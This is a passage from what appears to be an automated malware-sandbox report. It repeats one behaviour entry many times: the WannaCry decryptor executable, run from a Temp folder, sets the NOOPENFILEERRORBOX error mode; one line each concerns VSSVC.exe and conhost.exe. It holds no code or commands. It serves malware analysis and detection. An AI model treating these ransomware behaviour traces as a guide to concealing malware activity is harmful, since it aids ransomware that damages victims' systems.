              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\VSSVC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
